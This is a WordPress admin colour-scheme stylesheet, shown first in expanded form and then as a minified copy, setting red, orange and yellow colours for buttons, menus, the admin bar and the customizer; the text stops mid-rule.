color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button:disabled, .wp-core-ui .button.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Secondary button - same as default */ } .wp-core-ui .button-secondary { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button-secondary:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-secondary:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-secondary:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button-secondary:disabled, .wp-core-ui .button-secondary.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Primary button - theme color background */ } .wp-core-ui .button-primary { background: var(--wp-admin-theme-color); border-color: transparent; border-radius: 2px; color: #fff; } .wp-core-ui .button-primary:hover { background: var(--wp-admin-theme-color-darker-10); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:focus { background: var(--wp-admin-theme-color); border-color: transparent; color: #fff; /* Gutenberg-style focus ring: outer theme color + inset white for contrast */ box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color), inset 0 0 0 1px #ffffff; /* Visible in Windows High Contrast mode */ outline: 1px solid transparent; } .wp-core-ui .button-primary:active { background: var(--wp-admin-theme-color-darker-20); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:disabled, .wp-core-ui .button-primary.disabled { background: #f0f0f0; border-color: transparent; color: #949494; cursor: not-allowed; } .wp-core-ui .button-primary.active, .wp-core-ui .button-primary.active:focus, .wp-core-ui .button-primary.active:hover { background: var(--wp-admin-theme-color-darker-10); color: #fff; border-color: transparent; box-shadow: none; } .wp-core-ui .button-group > .button.active { border-color: var(--wp-admin-theme-color); background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .wp-core-ui .wp-ui-primary { color: #fff; background-color: #cf4944; } .wp-core-ui .wp-ui-text-primary { color: #cf4944; } .wp-core-ui .wp-ui-highlight { color: #fff; background-color: #dd823b; } .wp-core-ui .wp-ui-text-highlight { color: #dd823b; } .wp-core-ui .wp-ui-notification { color: #fff; background-color: #ccaf0b; } .wp-core-ui .wp-ui-text-notification { color: #ccaf0b; } .wp-core-ui .wp-ui-text-icon { color: hsl(2.1582733813, 7%, 95%); } /* List tables */ .wrap .page-title-action { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wrap .page-title-action:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wrap .page-title-action:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wrap .page-title-action:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .view-switch a.current:before { color: #cf4944; } .view-switch a:hover:before { color: #ccaf0b; } /* Admin Menu */ #adminmenuback, #adminmenuwrap, #adminmenu { background: #cf4944; } #adminmenu a { color: #fff; } #adminmenu div.wp-menu-image:before { color: hsl(2.1582733813, 7%, 95%); } #adminmenu a:hover, #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { color: #fff; background-color: #dd823b; } #adminmenu li.menu-top:hover div.wp-menu-image:before, #adminmenu li.opensub > a.menu-top div.wp-menu-image:before { color: #fff; } /* Active tabs use a bottom border color that matches the page background color. */ .about-wrap .nav-tab-active, .nav-tab-active, .nav-tab-active:hover { background-color: #f0f0f0; border-bottom-color: #f0f0f0; } /* Admin Menu: submenu */ #adminmenu .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu, #adminmenu .wp-has-current-submenu.opensub .wp-submenu, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { background: rgb(190.4217021277, 53.969787234, 48.8782978723); } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-right-color: rgb(190.4217021277, 53.969787234, 48.8782978723); } #adminmenu .wp-submenu .wp-submenu-head { color: rgb(240.6, 200.4, 198.9); } #adminmenu .wp-submenu a, #adminmenu .wp-has-current-submenu .wp-submenu a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a { color: rgb(240.6, 200.4, 198.9); } #adminmenu .wp-submenu a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-has-current-submenu .wp-submenu a:focus, #adminmenu .wp-has-current-submenu .wp-submenu a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } /* Admin Menu: current */ #adminmenu .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a { color: #fff; } #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { border-right-color: #f0f0f0; } #adminmenu li.current a.menu-top, #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head, .folded #adminmenu li.current.menu-top { color: #fff; background: #dd823b; } #adminmenu li.wp-has-current-submenu div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.current div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before, #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #fff; } /* Admin Menu: bubble */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { color: #fff; background: #ccaf0b; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins, #adminmenu li:hover a .awaiting-mod, #adminmenu li.menu-top:hover > a .update-plugins { color: #fff; background: rgb(190.4217021277, 53.969787234, 48.8782978723); } /* Admin Menu: collapse button */ #collapse-button { color: hsl(2.1582733813, 7%, 95%); } #collapse-button:hover, #collapse-button:focus { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } /* Admin Bar */ #wpadminbar { color: #fff; background: #cf4944; } #wpadminbar .ab-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #fff; } #wpadminbar .ab-icon, #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar .ab-item:after { color: hsl(2.1582733813, 7%, 95%); } #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojs .ab-top-menu > li.menupop:hover > .ab-item, #wpadminbar .ab-top-menu > li.menupop.hover > .ab-item { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); background: rgb(190.4217021277, 53.969787234, 48.8782978723); } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } #wpadminbar:not(.mobile) li:hover .ab-icon:before, #wpadminbar:not(.mobile) li:hover .ab-item:before, #wpadminbar:not(.mobile) li:hover .ab-item:after, #wpadminbar:not(.mobile) li:hover #adminbarsearch:before { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } /* Admin Bar: submenu */ #wpadminbar .menupop .ab-sub-wrapper { background: rgb(190.4217021277, 53.969787234, 48.8782978723); } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: rgb(207.3164148936, 107.1221761059, 103.3835851064); } #wpadminbar .ab-submenu .ab-item, #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: rgb(240.6, 200.4, 198.9); } #wpadminbar .quicklinks li .blavatar, #wpadminbar .menupop .menupop > .ab-item:before { color: hsl(2.1582733813, 7%, 95%); } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar, #wpadminbar .menupop .menupop > .ab-item:hover:before, #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: hsl(2.1582733813, 7%, 95%); } /* Admin Bar: search */ #wpadminbar #adminbarsearch:before { color: hsl(2.1582733813, 7%, 95%); } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { color: #fff; background: rgb(214.2919148936, 100.6485106383, 96.4080851064); } /* Admin Bar: recovery mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #ccaf0b; } #wpadminbar #wp-admin-bar-recovery-mode .ab-item, #wpadminbar #wp-admin-bar-recovery-mode a.ab-item { color: #fff; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover > .ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: rgb(183.6, 157.5, 9.9); } /* Admin Bar: my account */ #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { border-color: rgb(214.2919148936, 100.6485106383, 96.4080851064); background-color: rgb(214.2919148936, 100.6485106383, 96.4080851064); } #wpadminbar #wp-admin-bar-user-info .display-name { color: #fff; } #wpadminbar #wp-admin-bar-user-info a:hover .display-name { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } #wpadminbar #wp-admin-bar-user-info .username { color: rgb(240.6, 200.4, 198.9); } /* Pointers */ .wp-pointer .wp-pointer-content h3 { background-color: #dd823b; border-color: rgb(216.8782608696, 116.1847826087, 37.6217391304); } .wp-pointer .wp-pointer-content h3:before { color: #dd823b; } .wp-pointer.wp-pointer-top .wp-pointer-arrow, .wp-pointer.wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner { border-bottom-color: #dd823b; } /* Media */ .media-item .bar, .media-progress-bar div { background-color: #dd823b; } .details.attachment { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #dd823b; } .attachment.details .check { background-color: #dd823b; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #dd823b; } .media-selection .attachment.selection.details .thumbnail { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #dd823b; } /* Themes */ .theme-browser .theme.active .theme-name, .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { background: #dd823b; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { color: #dd823b; } .theme-section.current, .theme-filter.current { border-bottom-color: #cf4944; } body.more-filters-opened .more-filters { color: #fff; background-color: #cf4944; } body.more-filters-opened .more-filters:before { color: #fff; } body.more-filters-opened .more-filters:hover, body.more-filters-opened .more-filters:focus { background-color: #dd823b; color: #fff; } body.more-filters-opened .more-filters:hover:before, body.more-filters-opened .more-filters:focus:before { color: #fff; } /* Widgets */ .widgets-chooser li.widgets-chooser-selected { background-color: #dd823b; color: #fff; } .widgets-chooser li.widgets-chooser-selected:before, .widgets-chooser li.widgets-chooser-selected:focus:before { color: #fff; } /* Nav Menus */ .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 1px rgb(228.5391304348, 157.7173913043, 102.4608695652), 0 0 2px 1px #dd823b; } /* Responsive Component */ div#wp-responsive-toggle a:before { color: hsl(2.1582733813, 7%, 95%); } .wp-responsive-open div#wp-responsive-toggle a { border-color: transparent; background: #dd823b; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: rgb(190.4217021277, 53.969787234, 48.8782978723); } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: hsl(2.1582733813, 7%, 95%); } /* TinyMCE */ .mce-container.mce-menu .mce-menu-item:hover, .mce-container.mce-menu .mce-menu-item.mce-selected, .mce-container.mce-menu .mce-menu-item:focus, .mce-container.mce-menu .mce-menu-item-normal.mce-active, .mce-container.mce-menu .mce-menu-item-preview.mce-active { background: #dd823b; } /* Customizer */ .wp-core-ui #customize-controls .control-section:hover > .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:hover, .wp-core-ui #customize-controls .control-section.open .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:focus { color: #0073aa; border-left-color: #dd823b; } .wp-core-ui .customize-controls-close:focus, .wp-core-ui .customize-controls-close:hover, .wp-core-ui .customize-controls-preview-toggle:focus, .wp-core-ui .customize-controls-preview-toggle:hover { color: #0073aa; border-top-color: #dd823b; } .wp-core-ui .customize-panel-back:hover, .wp-core-ui .customize-panel-back:focus, .wp-core-ui .customize-section-back:hover, .wp-core-ui .customize-section-back:focus { color: #0073aa; border-left-color: #dd823b; } .wp-core-ui .customize-screen-options-toggle:hover, .wp-core-ui .customize-screen-options-toggle:active, .wp-core-ui .customize-screen-options-toggle:focus, .wp-core-ui .active-menu-screen-options .customize-screen-options-toggle, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: #0073aa; } .wp-core-ui .customize-screen-options-toggle:focus:before, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before, .wp-core-ui.wp-customizer button:focus .toggle-indicator:before, .wp-core-ui .menu-item-bar .item-delete:focus:before, .wp-core-ui #available-menu-items .item-add:focus:before, .wp-core-ui #customize-save-button-wrapper .save:focus, .wp-core-ui #publish-settings:focus { box-shadow: 0 0 0 1px rgb(228.5391304348, 157.7173913043, 102.4608695652), 0 0 2px 1px #dd823b; } .wp-core-ui #customize-controls .customize-info.open .customize-help-toggle, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover { color: #0073aa; } .wp-core-ui .control-panel-themes .customize-themes-section-title:focus, .wp-core-ui .control-panel-themes .customize-themes-section-title:hover { border-left-color: #dd823b; color: #0073aa; } .wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after { background: #dd823b; } .wp-core-ui .control-panel-themes .customize-themes-section-title.selected { color: #0073aa; } .wp-core-ui #customize-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after, .wp-core-ui #customize-outer-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after { color: #0073aa; } .wp-core-ui .customize-control .attachment-media-view .button-add-media:focus { background-color: #fbfbfc; border-color: #dd823b; border-style: solid; box-shadow: 0 0 0 1px #dd823b; outline: 2px solid transparent; } .wp-core-ui .wp-full-overlay-footer .devices button:focus, .wp-core-ui .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: #dd823b; } .wp-core-ui .wp-full-overlay-footer .devices button:hover:before, .wp-core-ui .wp-full-overlay-footer .devices button:focus:before { color: #dd823b; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus { color: #dd823b; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 1px rgb(228.5391304348, 157.7173913043, 102.4608695652), 0 0 2px 1px #dd823b; } .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover { border-bottom-color: #dd823b; color: #0073aa; }/*! This file is auto-generated */ body{background:#f0f0f0}a{color:#0073aa}a:active,a:focus,a:hover{color:rgb(0,149.5,221)}#post-body #visibility:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-revisions:before,.curtime #timestamp:before,span.wp-media-buttons-icon:before{color:currentColor}.wp-core-ui .button-link,.wp-core-ui .button.button-link{color:var(--wp-admin-theme-color)}.wp-core-ui .button-link:active,.wp-core-ui .button-link:hover,.wp-core-ui .button.button-link:active,.wp-core-ui .button.button-link:hover{color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-link:focus,.wp-core-ui .button.button-link:focus{color:var(--wp-admin-theme-color);border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-link:disabled,.wp-core-ui .button-link[aria-disabled=true],.wp-core-ui .button.button-link:disabled,.wp-core-ui .button.button-link[aria-disabled=true]{color:#949494}.media-modal .delete-attachment,.media-modal .trash-attachment,.media-modal .untrash-attachment,.wp-core-ui .button-link-delete{color:#cc1818}.media-modal .delete-attachment:focus,.media-modal .delete-attachment:hover,.media-modal .trash-attachment:focus,.media-modal .trash-attachment:hover,.media-modal .untrash-attachment:focus,.media-modal .untrash-attachment:hover,.wp-core-ui .button-link-delete:focus,.wp-core-ui .button-link-delete:hover{color:rgb(230.6842105263,48.3157894737,48.3157894737)}input[type=checkbox]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}input[type=radio]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.wp-core-ui input[type=reset]:active,.wp-core-ui input[type=reset]:hover{color:rgb(0,149.5,221)}input[type=color]:focus,input[type=date]:focus,input[type=datetime-local]:focus,input[type=datetime]:focus,input[type=email]:focus,input[type=month]:focus,input[type=number]:focus,input[type=password]:focus,input[type=search]:focus,input[type=tel]:focus,input[type=text]:focus,input[type=time]:focus,input[type=url]:focus,input[type=week]:focus,select:focus,textarea:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}input[type=checkbox]:focus,input[type=radio]:focus{border-color:#1e1e1e;box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid transparent}.wp-core-ui select:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-tags-autocomplete .ui-state-focus,.wp-tags-autocomplete [aria-selected=true]{background-color:var(--wp-admin-theme-color)}#pass1-text:focus,#pass1:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.mailserver-pass-wrap .button.wp-hide-pw:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-core-ui .button{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button.disabled,.wp-core-ui .button:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-secondary{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button-secondary:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-secondary:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-secondary:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button-secondary.disabled,.wp-core-ui .button-secondary:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary{background:var(--wp-admin-theme-color);border-color:transparent;border-radius:2px;color:#fff}.wp-core-ui .button-primary:hover{background:var(--wp-admin-theme-color-darker-10);border-color:transparent;color:#fff}.wp-core-ui .button-primary:focus{background:var(--wp-admin-theme-color);border-color:transparent;color:#fff;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid transparent}.wp-core-ui .button-primary:active{background:var(--wp-admin-theme-color-darker-20);border-color:transparent;color:#fff}.wp-core-ui .button-primary.disabled,.wp-core-ui .button-primary:disabled{background:#f0f0f0;border-color:transparent;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary.active,.wp-core-ui .button-primary.active:focus,.wp-core-ui .button-primary.active:hover{background:var(--wp-admin-theme-color-darker-10);color:#fff;border-color:transparent;box-shadow:none}.wp-core-ui .button-group>.button.active{border-color:var(--wp-admin-theme-color);background:rgba(var(--wp-admin-theme-color--rgb),.08)}.wp-core-ui .wp-ui-primary{color:#fff;background-color:#cf4944}.wp-core-ui .wp-ui-text-primary{color:#cf4944}.wp-core-ui .wp-ui-highlight{color:#fff;background-color:#dd823b}.wp-core-ui .wp-ui-text-highlight{color:#dd823b}.wp-core-ui .wp-ui-notification{color:#fff;background-color:#ccaf0b}.wp-core-ui .wp-ui-text-notification{color:#ccaf0b}.wp-core-ui .wp-ui-text-icon{color:hsl(2.1582733813,7%,95%)}.wrap .page-title-action{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wrap .page-title-action:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wrap .page-title-action:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wrap .page-title-action:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.view-switch a.current:before{color:#cf4944}.view-switch a:hover:before{color:#ccaf0b}#adminmenu,#adminmenuback,#adminmenuwrap{background:#cf4944}#adminmenu a{color:#fff}#adminmenu div.wp-menu-image:before{color:hsl(2.1582733813,7%,95%)}#adminmenu a:hover,#adminmenu li.menu-top:hover,#adminmenu li.opensub>a.menu-top,#adminmenu li>a.menu-top:focus{color:#fff;background-color:#dd823b}#adminmenu li.menu-top:hover div.wp-menu-image:before,#adminmenu li.opensub>a.menu-top div.wp-menu-image:before{color:#fff}.about-wrap .nav-tab-active,.nav-tab-active,.nav-tab-active:hover{background-color:#f0f0f0;border-bottom-color:#f0f0f0}#adminmenu .wp-has-current-submenu .wp-submenu,#adminmenu .wp-has-current-submenu.opensub .wp-submenu,#adminmenu .wp-submenu,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu{background:rgb(190.4217021277,53.969787234,48.8782978723)}#adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after,#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after{border-right-color:rgb(190.4217021277,53.969787234,48.8782978723)}#adminmenu .wp-submenu .wp-submenu-head{color:rgb(240.6,200.4,198.9)}#adminmenu .wp-has-current-submenu .wp-submenu a,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a,#adminmenu .wp-submenu a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a{color:rgb(240.6,200.4,198.9)}#adminmenu .wp-has-current-submenu .wp-submenu a:focus,#adminmenu .wp-has-current-submenu .wp-submenu a:hover,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover,#adminmenu .wp-submenu a:focus,#adminmenu .wp-submenu a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:hover{color:rgb(247.3869565217,227.0108695652,211.1130434783)}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a,#adminmenu .wp-submenu li.current a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a{color:#fff}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover,#adminmenu .wp-submenu li.current a:focus,#adminmenu .wp-submenu li.current a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:hover{color:rgb(247.3869565217,227.0108695652,211.1130434783)}ul#adminmenu a.wp-has-current-submenu:after,ul#adminmenu>li.current>a.current:after{border-right-color:#f0f0f0}#adminmenu li.current a.menu-top,#adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head,#adminmenu li.wp-has-current-submenu a.wp-has-current-submenu,.folded #adminmenu li.current.menu-top{color:#fff;background:#dd823b}#adminmenu a.current:hover div.wp-menu-image:before,#adminmenu li a:focus div.wp-menu-image:before,#adminmenu li.current div.wp-menu-image:before,#adminmenu li.opensub div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before,#adminmenu li:hover div.wp-menu-image:before{color:#fff}#adminmenu .awaiting-mod,#adminmenu .menu-counter,#adminmenu .update-plugins{color:#fff;background:#ccaf0b}#adminmenu li a.wp-has-current-submenu .update-plugins,#adminmenu li.current a .awaiting-mod,#adminmenu li.menu-top:hover>a .update-plugins,#adminmenu li:hover a 